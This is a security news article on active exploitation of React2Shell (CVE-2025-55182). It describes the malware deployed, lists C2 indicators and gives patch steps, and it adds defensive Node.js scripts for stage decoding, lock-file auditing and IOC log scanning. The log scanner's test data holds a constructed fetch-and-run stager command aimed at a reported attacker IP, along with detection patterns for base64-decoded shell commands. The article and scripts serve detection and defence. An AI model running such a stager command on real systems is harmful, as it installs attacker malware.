Researchers have observed active exploitation of a critical vulnerability in React Server Components, tracked as CVE-2025-55182 (React2Shell), targeting companies across multiple industry sectors worldwide.
React2Shell affects the Flight protocol, which facilitates client-server communication for React Server Components.
The vulnerability stems from insecure deserialization: servers accept client-supplied Flight payloads without proper verification, enabling remote code execution under specific conditions.
The campaign, first identified in December 2025, demonstrates how quickly adversaries can weaponize newly disclosed flaws to deploy diverse malware payloads.
Affected packages include react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack versions 19.0 through 19.2.0. Patches are available in versions 19.0.1, 19.1.2, and 19.2.1.
Attack Campaigns and Malware
BI.ZONE Threat Detection and Response identified multiple attack waves targeting Russian insurance, e-commerce, and IT sectors, while global campaigns hit organizations elsewhere.
Attackers deliver payloads through Base64-encoded commands executed within compromised containers, establishing persistence via systemd services, cron jobs, and modified startup scripts.
XMRig Cryptocurrency Miner: The most frequently deployed malware, installed through Bash scripts (apaches.sh, setup2.sh, sex.sh) that create persistence mechanisms and terminate competing processes consuming excessive CPU resources.
Kaiji Botnet: Deployed as architecture-specific ELF executables (linux_386, linux_amd64), this Golang-based botnet performs DDoS attacks via SYN, ACK, and UDP floods, executes arbitrary shell commands, and embeds XMRig. It establishes persistence through systemd services, crontab tasks, and init.d scripts, and masquerades as legitimate system libraries.
Figure: setup2.sh (Source: Medium)
RustoBot: Written in Rust and targeting TOTOLINK devices, this botnet retrieves C2 addresses through domain resolution (ilefttotolinkalone.anondns[.]net, rustbot.anondns[.]net) and conducts configurable DDoS attacks via UDP, TCP, and raw IP floods.
Sliver Implant: An implant from the open-source Sliver C2 framework, deployed via the d5.sh script. It establishes persistence with root privileges through immutable files in /usr/bin/sshd-agent, or in hidden directories for non-root users, and connects to keep.camdvr[.]org for command-and-control.
CrossC2 Framework: Attackers deploy Cobalt Strike beacon payloads (a_x86, a_x64) packed with UPX, using AES-128-CBC encryption with hardcoded keys. The framework enables post-exploitation activities via the C2 server at 154.89.152[.]240:443.

Tactical RMM: Remote monitoring and management tools downloaded from 156.67.221[.]96, allowing attackers to maintain persistent administrative access.
VShell Backdoor: Go-based backdoor delivered through staged loaders that decrypt payloads using XOR with key 0x99, executed via memfd_create to evade detection. Configuration includes server 107.173.89[.]153:60051 and vkey “qwe123qwe111”.
EtherRAT: A novel JavaScript-based remote access trojan that retrieves C2 addresses from Ethereum smart contracts (0x22f96d61cf118efabc7c5bf3384734fad2f6ead4) via RPC endpoints.
The malware executes arbitrary JS code, steals cryptocurrency wallets, SSH keys, cloud credentials, and modifies nginx/Apache configurations to redirect traffic to external domains.
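As an added illustration (not code from the BI.ZONE report or from any of the malware described), the following Node.js snippet shows the analyst side of the VShell loader scheme: XOR-decoding a stage with key 0x99, confirming the result is an ELF, carving out the host:port configuration string, and recognising a memfd_create-backed process by its /proc/<pid>/exe link target. The sample stage is constructed here from an ELF header plus the reported server and vkey strings; the real loader's layout and any further obfuscation are assumptions not covered by the page.

```javascript
// Added example (not from the BI.ZONE report): analyst helpers for the VShell
// loader scheme described above. The stage is a constructed stand-in (an ELF
// header plus the reported C2 string and vkey, XOR-encoded with 0x99); the
// real loader's layout and any extra obfuscation are not known from the page.

const XOR_KEY = 0x99;

// Single-byte XOR is its own inverse, so this both encodes and decodes.
function xorBytes(buf, key = XOR_KEY) {
  const out = Buffer.alloc(buf.length);
  for (let i = 0; i < buf.length; i++) out[i] = buf[i] ^ key;
  return out;
}

// ELF magic: 0x7f 'E' 'L' 'F'.
function isElf(buf) {
  return buf.length >= 4 && buf[0] === 0x7f && buf[1] === 0x45 && buf[2] === 0x4c && buf[3] === 0x46;
}

// Runs of printable ASCII, like strings(1), over a decoded stage.
function extractStrings(buf, minLen = 6) {
  const re = new RegExp(`[\\x20-\\x7e]{${minLen},}`, 'g');
  return buf.toString('latin1').match(re) || [];
}

// Decode a stage, confirm it is an ELF, and pull out anything shaped like host:port.
function triageStage(encoded, key = XOR_KEY) {
  const decoded = xorBytes(encoded, key);
  const strings = extractStrings(decoded);
  return {
    isElf: isElf(decoded),
    strings,
    endpoints: strings.filter((s) => /^\d{1,3}(?:\.\d{1,3}){3}:\d{1,5}$/.test(s)),
  };
}

// A memfd_create-backed process shows "/memfd:<name> (deleted)" as the target
// of its /proc/<pid>/exe symlink; flag that shape when sweeping a host.
function isMemfdBacked(exeTarget) {
  return /^\/memfd:/.test(exeTarget);
}

// Constructed sample: minimal ELF ident followed by NUL-separated config strings.
const SAMPLE_PLAIN = Buffer.concat([
  Buffer.from([0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00]),
  Buffer.from('107.173.89.153:60051\0qwe123qwe111\0', 'latin1'),
]);
const SAMPLE_STAGE = xorBytes(SAMPLE_PLAIN);

const result = triageStage(SAMPLE_STAGE);
console.log(result);
console.log(isMemfdBacked('/memfd:kworker (deleted)'));
```

On a live host the same check would read each `/proc/<pid>/exe` link with `fs.readlinkSync` and pass the target to `isMemfdBacked`; a wrong XOR key simply yields no ELF magic and no readable strings, which is the quickest way to confirm the key before spending time on a sample.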
Adversaries use DNS tunneling to exfiltrate reconnaissance data, encoding command execution results into lookups of oastify[.]com subdomains (the Burp Suite Collaborator callback domain).
Reconnaissance scripts gather system information, network configurations, and running processes, exfiltrating data to endpoints like 109.238.92[.]111:8000/upload.
Attackers also add SSH keys to authorized_keys files for persistent access and terminate security monitoring processes to evade detection.
Mitigations
Organizations must immediately update all affected react-server-dom-* packages to patched versions (19.0.1, 19.1.2, 19.2.1 or higher). Next.js projects should be upgraded to include these patched dependencies.
After updating, rebuild projects and verify lock files to ensure vulnerable versions are completely removed.
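One way to do that lock-file check, as an added example and not tooling from the React project or from the article: the Node.js script below walks a package-lock.json (the flat packages map of lockfileVersion 2/3, or the nested dependencies tree of version 1) and flags any copy of react-server-dom-webpack, react-server-dom-parcel or react-server-dom-turbopack, including nested duplicates under a framework package, that sits below 19.0.1, 19.1.2 or 19.2.1 on its minor line. The sample lock file is constructed; the treatment of canary builds is an assumption noted in the code.

```javascript
// Added example (not from the article or the React project): audit an npm
// package-lock.json for react-server-dom-* versions in the affected range.
// Affected per the advisory ranges quoted above: 19.0.x < 19.0.1,
// 19.1.x < 19.1.2, 19.2.x < 19.2.1. Canary/experimental builds are treated as
// their base version here (an assumption); verify them against React's notes.

const AFFECTED_PACKAGES = new Set([
  'react-server-dom-webpack',
  'react-server-dom-parcel',
  'react-server-dom-turbopack',
]);

// Minimum safe patch level per 19.x minor line.
const FIXED_PATCH = { 0: 1, 1: 2, 2: 1 };

// Parse "19.2.0" or "19.2.0-canary-abc" into numeric [major, minor, patch];
// a pre-release suffix is ignored, which treats a canary as its base version.
function parseVersion(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(version));
  return m ? m.slice(1, 4).map(Number) : null;
}

function isVulnerable(name, version) {
  if (!AFFECTED_PACKAGES.has(name)) return false;
  const parsed = parseVersion(version);
  if (!parsed) return false; // unparsable (e.g. a git URL): inspect by hand
  const [major, minor, patch] = parsed;
  if (major !== 19 || !(minor in FIXED_PATCH)) return false;
  return patch < FIXED_PATCH[minor];
}

// lockfileVersion 2/3 keeps a flat "packages" map keyed by install path, so
// nested copies (node_modules/next/node_modules/...) are visible directly.
// lockfileVersion 1 nests "dependencies" recursively instead.
function auditLockfile(lock) {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (!path) continue; // "" is the root project itself
    const name = entry.name || path.split('node_modules/').pop();
    if (isVulnerable(name, entry.version)) hits.push({ path, name, version: entry.version });
  }
  const walk = (deps, prefix) => {
    for (const [name, entry] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${name}`;
      if (isVulnerable(name, entry.version)) hits.push({ path, name, version: entry.version });
      walk(entry.dependencies, `${path}/`);
    }
  };
  if (!lock.packages) walk(lock.dependencies, '');
  return hits;
}

// Constructed sample lock file (lockfileVersion 3): one patched copy and two
// vulnerable copies, one of them nested under a framework package.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/react': { version: '19.2.0' },
    'node_modules/react-server-dom-webpack': { version: '19.2.0' },
    'node_modules/react-server-dom-turbopack': { version: '19.2.1' },
    'node_modules/next/node_modules/react-server-dom-webpack': { version: '19.1.1' },
  },
};

for (const hit of auditLockfile(SAMPLE_LOCK)) {
  console.log(`VULNERABLE ${hit.name}@${hit.version} at ${hit.path}`);
}
```

Run it against a real project with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` in place of `SAMPLE_LOCK`; the nested path in the output is the case `npm ls` at the top level can hide, and it is why the text above insists on checking the lock file after the rebuild rather than only package.json.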
Security teams should audit systems for IOCs, particularly connections to known malicious IPs (176.117.107[.]154, 45.137.201[.]137, 103.135.101[.]15, 128.199.194[.]97, 216.158.232[.]43) and domains, and monitor for unauthorized systemd services or cron jobs.
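To make that audit concrete, here is an added example (not from the BI.ZONE report) of a small Node.js triage script that matches log lines against the IP and domain indicators named in this article, treating any subdomain of oastify[.]com or anondns[.]net as a hit, and that unwraps the echo <base64> | base64 -d command pattern described above so the stager URL inside it is checked as well. The log lines, the stager command and the process names are constructed for the demonstration.

```javascript
// Added example (not from the BI.ZONE report): triage log lines against the
// network IOCs quoted in the article and unwrap the "echo <b64> | base64 -d"
// command pattern described above. Sample lines are constructed for the demo.

const IOC_IPS = new Set([
  '176.117.107.154', '45.137.201.137', '103.135.101.15', '128.199.194.97',
  '216.158.232.43', '154.89.152.240', '156.67.221.96', '107.173.89.153',
  '109.238.92.111',
]);

// Parent domains; any subdomain counts (DNS-tunnel labels under oastify.com,
// the RustoBot anondns.net names, the Sliver C2 host).
const IOC_DOMAINS = ['keep.camdvr.org', 'anondns.net', 'oastify.com'];

const IP_RE = /\b(\d{1,3}(?:\.\d{1,3}){3})\b/g;
const HOST_RE = /\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b/gi;
const B64_CMD_RE = /(?:echo|printf)\s+["']?([A-Za-z0-9+/=]{16,})["']?\s*\|\s*base64\s+(?:-d|--decode)\b/;

function domainMatches(host) {
  const h = host.toLowerCase();
  return IOC_DOMAINS.some((d) => h === d || h.endsWith('.' + d));
}

// Return the decoded command when the line pipes a base64 blob into base64 -d.
function decodeBase64Command(line) {
  const m = B64_CMD_RE.exec(line);
  return m ? Buffer.from(m[1], 'base64').toString('utf8') : null;
}

// Findings for one line; a decoded command is scanned again (bounded depth),
// since the stager address is usually only visible after decoding.
function scanLine(line, depth = 0) {
  const findings = [];
  for (const m of line.matchAll(IP_RE)) {
    if (IOC_IPS.has(m[1])) findings.push({ type: 'ioc-ip', value: m[1] });
  }
  for (const m of line.matchAll(HOST_RE)) {
    if (domainMatches(m[1])) findings.push({ type: 'ioc-domain', value: m[1] });
  }
  const decoded = decodeBase64Command(line);
  if (decoded !== null && depth < 3) {
    findings.push({ type: 'base64-command', value: decoded });
    findings.push(...scanLine(decoded, depth + 1));
  }
  return findings;
}

// Keep only the lines that produced at least one finding.
function scanLogs(lines) {
  return lines
    .map((line) => ({ line, findings: scanLine(line) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed stager command, wrapped the way the article describes.
const STAGER_CMD = 'curl -s http://156.67.221.96/d5.sh | bash';
const STAGER_B64 = Buffer.from(STAGER_CMD).toString('base64');

const SAMPLE_LINES = [
  'conntrack: [NEW] tcp src=10.0.0.5 dst=154.89.152.240 sport=41234 dport=443',
  'named[1234]: client 10.0.0.5#4412: query: id-root.c8abc1.oastify.com IN TXT',
  `audit: comm="sh" cmd="sh -c echo ${STAGER_B64} | base64 -d | bash"`,
  'sshd[2201]: Accepted publickey for deploy from 10.0.0.7 port 51022',
];

for (const hit of scanLogs(SAMPLE_LINES)) {
  console.log(hit.line);
  for (const f of hit.findings) console.log(`  ${f.type}: ${f.value}`);
}
```

Feed it `fs.readFileSync(path, 'utf8').split('\n')` from auditd, conntrack or resolver logs; the defanged `[.]` in the indicators above has to be turned back into a plain dot, as the sets here already do, or nothing will ever match.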
The rapid weaponization of React2Shell within hours of disclosure underscores the critical importance of immediate patching and continuous monitoring for post-exploitation activity.
